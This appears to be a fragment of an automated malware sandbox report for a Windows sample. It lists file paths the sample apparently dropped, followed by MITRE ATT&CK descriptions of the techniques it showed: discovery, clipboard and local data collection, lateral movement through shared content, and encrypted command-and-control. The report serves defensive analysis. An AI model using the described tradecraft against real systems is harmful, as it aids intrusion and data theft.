C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe

C:\ProgramData\SoftwareDistribution\cmd.exe

C:\ProgramData\SoftwareDistribution\ebf1f9fa8afd6d

C:\Recovery\dca45fe6245a48

C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe

C:\Users\Public\Libraries\dca45fe6245a48

C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe

Windows Analysis Report
kJrNOFEGbQ.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre